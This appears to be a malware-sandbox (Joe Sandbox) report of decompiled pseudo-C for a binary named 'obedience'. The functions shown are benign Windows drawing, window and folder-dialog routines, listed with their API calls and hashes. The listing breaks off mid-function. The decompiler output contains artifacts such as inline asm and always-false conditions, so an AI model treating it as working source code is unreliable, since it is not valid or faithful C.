      • API String ID:
      • Opcode ID: 9a70bdd5f2eb97b6914e008b1ef6983fbb90842f2c19c8f7c75e119c60eb4503
      • Instruction ID: 074e843880fe2dc0be29ea3aaec3898d0ef650849bcbe0301b3c535a4197778e
      • Opcode Fuzzy Hash: 9a70bdd5f2eb97b6914e008b1ef6983fbb90842f2c19c8f7c75e119c60eb4503
      • Instruction Fuzzy Hash: 3D71E574A04104EFDB10DBA9C589EAEB7F5AF49304F2541F6E808EB362D739AE459B04
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00454D8C Relevance: 7.7, APIs: 5, Instructions: 162COMMON
      Download Yara Rule
      C-Code - Quality: 85%
      			E00454D8C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x454f70);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00456D64(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E004583D0(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404AD8( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404E4C(_v16, 0x454f94);
					if(_t153 != 0) {
						E00426414( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E00425DEC( *((intOrPtr*)(_v8 + 0xc))) |  *0x454f98;
							E00425DF8( *((intOrPtr*)(_v8 + 0xc)), E00425DEC( *((intOrPtr*)(_v8 + 0xc))) |  *0x454f98, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404D00(_v16);
							_t65 = E00404F00(_v16);
							DrawTextA(E00426B00(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x454f77);
							return E00404A40( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00425B2C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404D00(_v16);
								_t91 = E00404F00(_v16);
								DrawTextA(E00426B00(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00425B2C( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E0042566C(0xff00000d);
								_t78 = E0042566C(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00425B2C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00426B00(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404D08( &_v16, 0x454f88);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















      0x00454d8c
      0x00454d8d
      0x00454d97
      0x00454d9a
      0x00454d9d
      0x00454da0
      0x00454da2
      0x00454da7
      0x00454da8
      0x00454dad
      0x00454db0
      0x00454db5
      0x00454dba
      0x00454dbe
      0x00454dce
      0x00454ddd
      0x00454de0
      0x00454de5
      0x00454de5
      0x00454de5
      0x00454dd0
      0x00454dd3
      0x00454dd3
      0x00454de8
      0x00454de8
      0x00454df4
      0x00454dfc
      0x00454e22
      0x00454e2a
      0x00454e2f
      0x00454e6d
      0x00454e72
      0x00454e76
      0x00454e7b
      0x00454e87
      0x00454e8f
      0x00454e8f
      0x00454e94
      0x00454e98
      0x00454f35
      0x00454f3d
      0x00454f46
      0x00454f55
      0x00454f5a
      0x00454f5c
      0x00454f5f
      0x00454f62
      0x00454f6f
      0x00454e9e
      0x00454e9e
      0x00454ea2
      0x00454eac
      0x00454ebc
      0x00454ec9
      0x00454ed2
      0x00454ee1
      0x00454eee
      0x00454eee
      0x00454ef3
      0x00454ef7
      0x00454f25
      0x00454f30
      0x00454ef9
      0x00454efe
      0x00454f0a
      0x00454f0f
      0x00454f11
      0x00000000
      0x00000000
      0x00454f1e
      0x00454f1e
      0x00000000
      0x00454ef7
      0x00454e98
      0x00454e34
      0x00454e42
      0x00454e43
      0x00454e44
      0x00454e45
      0x00454e46
      0x00454e5b
      0x00454e5b
      0x00000000
      0x00454dfe
      0x00454e02
      0x00454e15
      0x00454e1d
      0x00000000
      0x00454e1d
      0x00454e0a
      0x00000000
      0x00000000
      0x00454e0f
      0x00454e13
      0x00000000
      0x00000000
      0x00000000
      0x00454e13

      APIs
      • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00454E5B
      • OffsetRect.USER32(?,00000001,00000001), ref: 00454EAC
      • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00454EE1
      • OffsetRect.USER32(?,000000FF,000000FF), ref: 00454EEE
      • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00454F55
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Draw$OffsetRectText$Edge
      • String ID:
      • API String ID: 3610532707-0
      • Opcode ID: 745855b0b0b7b087fa45bddbec14b5f9f56833dc7bd2a4568fd4ae27f4a87528
      • Instruction ID: e3a3b80ac8318014a933cb06442803981c88269cf628af39e922d01de25676b1
      • Opcode Fuzzy Hash: 745855b0b0b7b087fa45bddbec14b5f9f56833dc7bd2a4568fd4ae27f4a87528
      • Instruction Fuzzy Hash: 3C517F70A04204AFDB11EBA9DC82B9E77E5AF84319F55816AFD14EB382C73CAD44871D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00442288 Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON
      Download Yara Rule
      C-Code - Quality: 92%
      			E00442288(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E004426D8(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x48f840; // 0x490b7c
				_t4 =  *_t104 + 0x30; // 0xe036e
				if(_t53 ==  *_t4) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0044B158(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x4406ec; // 0x440738
						__eflags = E00403D88( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E0044B158( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E0044221C);
						_push(GetCurrentThreadId());
						L004075E8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403DF8(_t101, _t126);
						_t78 =  *0x490afc; // 0x0
						_t110 =  *0x43f2cc; // 0x43f318
						if(E00403D88(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x490afc; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x490afc; // 0x0
						if(E0044B158( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0044B158(_t116);
					goto L19;
				}
				_t117 = E004417EC(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0044B158(_t117);
					goto L6;
				}
			}































      0x00442288
      0x00442291
      0x00442293
      0x004422a2
      0x004422a4
      0x004422aa
      0x004422af
      0x004422b7
      0x004422ba
      0x004422e3
      0x004422e7
      0x00442416
      0x0044241f
      0x0044241f
      0x004422ed
      0x004422f3
      0x004422f3
      0x004422f8
      0x00000000
      0x00000000
      0x004422f1
      0x004422f1
      0x00442301
      0x00442303
      0x00442309
      0x00000000
      0x00000000
      0x00442312
      0x00442315
      0x0044231a
      0x0044233b
      0x0044233e
      0x00442349
      0x0044234b
      0x0044235d
      0x0044235f
      0x0044234d
      0x00442350
      0x00442358
      0x00442358
      0x00442362
      0x00442362
      0x00442366
      0x0044236c
      0x00442372
      0x00442378
      0x00442379
      0x00442383
      0x00442384
      0x00442389
      0x0044238d
      0x00000000
      0x00000000
      0x0044239b
      0x004423a6
      0x004423ab
      0x004423bb
      0x004423c0
      0x004423c5
      0x004423d2
      0x004423fd
      0x00442410
      0x00442412
      0x00442412
      0x00000000
      0x00442410
      0x004423d4
      0x004423e3
      0x00000000
      0x00000000
      0x004423e5
      0x004423fb
      0x00000000
      0x00000000
      0x00000000
      0x004423fb
      0x0044231f
      0x00442325
      0x00442325
      0x0044232a
      0x00000000
      0x00000000
      0x00442323
      0x00442323
      0x00442333
      0x00000000
      0x00442333
      0x004422c4
      0x004422c8
      0x00000000
      0x004422ce
      0x004422d2
      0x004422d2
      0x004422d7
      0x00000000
      0x00000000
      0x004422d0
      0x004422d0
      0x004422e0
      0x00000000
      0x004422e0

      APIs
        • Part of subcall function 004426D8: WindowFromPoint.USER32(004424B2,00490B20,00000000,004422A2,?,-0000000C,?), ref: 004426DE
        • Part of subcall function 004426D8: GetParent.USER32(00000000), ref: 004426F5
      • GetWindow.USER32(00000000,00000004), ref: 004422AA
      • GetCurrentThreadId.KERNEL32 ref: 0044237E
      • 73BEAC10.USER32(00000000,0044221C,?,00000000,00000004,?,-0000000C,?), ref: 00442384
      • GetWindowRect.USER32 ref: 0044239B
      • IntersectRect.USER32 ref: 00442409
        • Part of subcall function 004417EC: GetWindowThreadProcessId.USER32(00000000), ref: 004417F9
        • Part of subcall function 004417EC: GetCurrentProcessId.KERNEL32(?,?,00000000,004642DF,?,?,?,00000001,0046444B,?,?,?,?), ref: 00441802
        • Part of subcall function 004417EC: GlobalFindAtomA.KERNEL32(00000000), ref: 00441817
        • Part of subcall function 004417EC: GetPropA.USER32 ref: 0044182E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
      • String ID:
      • API String ID: 2049660638-0
      • Opcode ID: 7a7150ef0b02eb1c7e1b9154a03154701819972f8cd37f5e953f0173e9b18a56
      • Instruction ID: b703b679258e754295be31fcfbe001b4db9563f6bbfcf5fbc2c40f1deda06563
      • Opcode Fuzzy Hash: 7a7150ef0b02eb1c7e1b9154a03154701819972f8cd37f5e953f0173e9b18a56
      • Instruction Fuzzy Hash: 07516D35A002099FDB10DFA9C984AAEB7F4BF04354F948166F814EB351D778EE41CB99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004871F8 Relevance: 7.6, APIs: 5, Instructions: 131COMMON
      Download Yara Rule
      C-Code - Quality: 37%
      			E004871F8(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v9;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				char _v28;
				struct _ITEMIDLIST* _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct _browseinfo _v80;
				char* _t48;
				intOrPtr* _t54;
				intOrPtr* _t61;
				intOrPtr* _t89;
				intOrPtr* _t92;
				void* _t99;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t116;
				intOrPtr _t117;

				_t111 = __edi;
				_t115 = _t116;
				_t117 = _t116 + 0xffffffb4;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v40 = 0;
				_v8 = __ecx;
				_t99 = __edx;
				_t113 = __eax;
				_push(_t115);
				_push(0x4873d0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t117;
				_v9 = 0;
				if(E004873E0() == 0) {
					E00404A40(_v8);
				}
				E00403498( &_v80, 0x20);
				_t48 =  &_v36;
				_push(_t48);
				L00438F4C();
				if(_t48 != 0 || _v36 == 0) {
					_pop(_t108);
					 *[fs:eax] = _t108;
					_push(0x4873d7);
					E00406578( &_v40);
					return E00406578( &_v36);
				} else {
					_t54 = _v36;
					_v20 =  *((intOrPtr*)( *_t54 + 0xc))(_t54, 0x104);
					_push(_t115);
					_push(0x4873ab);
					_push( *[fs:eax]);
					 *[fs:eax] = _t117;
					_v28 = 0;
					E004053B8(_t99, 0);
					if(0 != 0) {
						L00438F44();
						_t89 =  *0x48f840; // 0x490b7c
						_t18 =  *_t89 + 0x30; // 0xe036e
						_t92 = _v40;
						 *((intOrPtr*)( *_t92 + 0xc))(_t92,  *_t18, 0, E004052F4(_t99),  &_v44,  &_v28,  &_v48,  &_v40);
					}
					_t61 =  *0x48f840; // 0x490b7c
					_t21 =  *_t61 + 0x30; // 0xe036e
					_v80 =  *_t21;
					_v76 = _v28;
					_v72 = _v20;
					_v68 = E00404F00(_t113);
					_v64 = 1;
					if( *_v8 != 0) {
						_v60 = E004871D0;
						_v56 = E00404F00( *_v8);
					}
					_v16 = E0045B38C(0, _t99, _t111, _t113);
					_v24 = SetErrorMode(1);
					_push(_t115);
					_push(0x487356);
					_push( *[fs:eax]);
					 *[fs:eax] = _t117;
					_v32 = SHBrowseForFolder( &_v80);
					_pop(_t110);
					 *[fs:eax] = _t110;
					_push(0x48735d);
					SetErrorMode(_v24);
					return E0045B440(_v16);
				}
			}


































      0x004871f8
      0x004871f9
      0x004871fb
      0x004871fe
      0x004871ff
      0x00487202
      0x00487205
      0x00487208
      0x0048720b
      0x0048720d
      0x00487211
      0x00487212
      0x00487217
      0x0048721a
      0x0048721d
      0x0048722d
      0x00487232
      0x00487232
      0x00487241
      0x00487246
      0x00487249
      0x0048724a
      0x00487251
      0x004873b4
      0x004873b7
      0x004873ba
      0x004873c2
      0x004873cf
      0x00487261
      0x00487266
      0x0048726f
      0x00487274
      0x00487275
      0x0048727a
      0x0048727d
      0x00487282
      0x00487289
      0x0048728e
      0x00487294
      0x004872af
      0x004872b6
      0x004872ba
      0x004872c0
      0x004872c0
      0x004872c3
      0x004872ca
      0x004872cd
      0x004872d3
      0x004872d9
      0x004872e3
      0x004872e6
      0x004872f3
      0x004872f5
      0x00487306
      0x00487306
      0x00487310
      0x0048731a
      0x0048731f
      0x00487320
      0x00487325
      0x00487328
      0x00487334
      0x00487339
      0x0048733c
      0x0048733f
      0x00487348
      0x00487355
      0x00487355

      APIs
      • SHGetMalloc.SHELL32(?), ref: 0048724A
      • SHGetDesktopFolder.SHELL32(?,00000000,004873AB), ref: 00487294
      • SetErrorMode.KERNEL32(00000001,00000000,004873AB), ref: 00487315
      • SHBrowseForFolder.SHELL32(?), ref: 0048732F
      • SetErrorMode.KERNEL32(?,0048735D,00000001,00000000,004873AB), ref: 00487348
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ErrorFolderMode$BrowseDesktopMalloc
      • String ID:
      • API String ID: 2427564971-0
      • Opcode ID: 2b67dbea790061ee53a7be6d924863f33e9f171dee3ed7cbe071363d62f7697c
      • Instruction ID: e067cca859c7af789acb35b75da99220a2e24c66894820c7be7da08dd8a7be52
      • Opcode Fuzzy Hash: 2b67dbea790061ee53a7be6d924863f33e9f171dee3ed7cbe071363d62f7697c
      • Instruction Fuzzy Hash: FD411971E042089FDB00EFA9D891A9EBBF8EB09304F61447AF904E7651D778AD04DB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00434EEC Relevance: 7.6, APIs: 5, Instructions: 110COMMON
      Download Yara Rule
      C-Code - Quality: 77%
      			E00434EEC(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x435042);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E00404D08( &_v8, 0x435058);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E00446C1C(_t76, _t93, _t104);
				E00426A20( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E00404D00(_v8);
					_t42 = E00404F00(_v8);
					DrawTextA(E00426B00( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E00425B2C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000014);
					_t54 = E00404D00(_v8);
					_t56 = E00404F00(_v8);
					DrawTextA(E00426B00( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E00425B2C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000010);
					_t65 = E00404D00(_v8);
					_t67 = E00404F00(_v8);
					DrawTextA(E00426B00( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x435049);
				return E00404A40( &_v8);
			}

















      0x00434eef
      0x00434ef4
      0x00434ef6
      0x00434ef8
      0x00434efc
      0x00434efd
      0x00434f02
      0x00434f05
      0x00434f0f
      0x00434f1b
      0x00434f45
      0x00434f45
      0x00434f51
      0x00434f53
      0x00434f53
      0x00434f62
      0x00434f6d
      0x00434f7b
      0x0043500c
      0x00435015
      0x00435027
      0x00434f81
      0x00434f86
      0x00434f99
      0x00434fa3
      0x00434fac
      0x00434fbe
      0x00434fc8
      0x00434fdb
      0x00434fe5
      0x00434fee
      0x00435000
      0x00435000
      0x0043502e
      0x00435031
      0x00435034
      0x00435041

      APIs
      • OffsetRect.USER32(?,00000001,00000001), ref: 00434F86
      • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00434FBE
      • OffsetRect.USER32(?,000000FF,000000FF), ref: 00434FC8
      • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00435000
      • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00435027
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: DrawText$OffsetRect
      • String ID:
      • API String ID: 1886049697-0
      • Opcode ID: ef1bdd8e4b321292d833d8a42ee2ebca4ab1f53c59a00ae5bf15d2d658e5372c
      • Instruction ID: d2490cd737bc36ce459315cec5c337c25ab01d7ef10b572567b8544b30e48f81
      • Opcode Fuzzy Hash: ef1bdd8e4b321292d833d8a42ee2ebca4ab1f53c59a00ae5bf15d2d658e5372c
      • Instruction Fuzzy Hash: 43316970A04104AFDB11EB69DC85F9F77A8EF89314F6541B6B404E7396CA79AD00C668
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00448DE4 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
      Download Yara Rule
      C-Code - Quality: 85%
      			E00448DE4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				void* _t76;
				intOrPtr _t85;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t101;
				void* _t102;
				intOrPtr _t103;

				_t101 = _t102;
				_t103 = _t102 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0044B158(_v8),  &_v84);
				}
				_push(_t101);
				_push(0x448f04);
				_push( *[fs:edx]);
				 *[fs:edx] = _t103;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t96 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t96 >= 0) {
						_t97 = _t96 + 1;
						_t99 = 0;
						do {
							_t64 = E00419C84( *((intOrPtr*)(_v8 + 0x198)), _t76, _t99);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t99 = _t99 + 1;
							_t97 = _t97 - 1;
						} while (_t97 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00448F3C(_v8, 0, _t75);
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(0x448f0b);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0044B158(_v8),  &_v84);
				}
				return _t55;
			}



















      0x00448de5
      0x00448de7
      0x00448ded
      0x00448df0
      0x00448df6
      0x00448dfb
      0x00448e0f
      0x00448e0f
      0x00448e13
      0x00448e14
      0x00448e19
      0x00448e1c
      0x00448e29
      0x00448e43
      0x00448e46
      0x00448e59
      0x00448e5c
      0x00448e5e
      0x00448e5f
      0x00448e61
      0x00448e6c
      0x00448e75
      0x00448e87
      0x00000000
      0x00448e89
      0x00448ea5
      0x00448eac
      0x00000000
      0x00000000
      0x00448eac
      0x00000000
      0x00000000
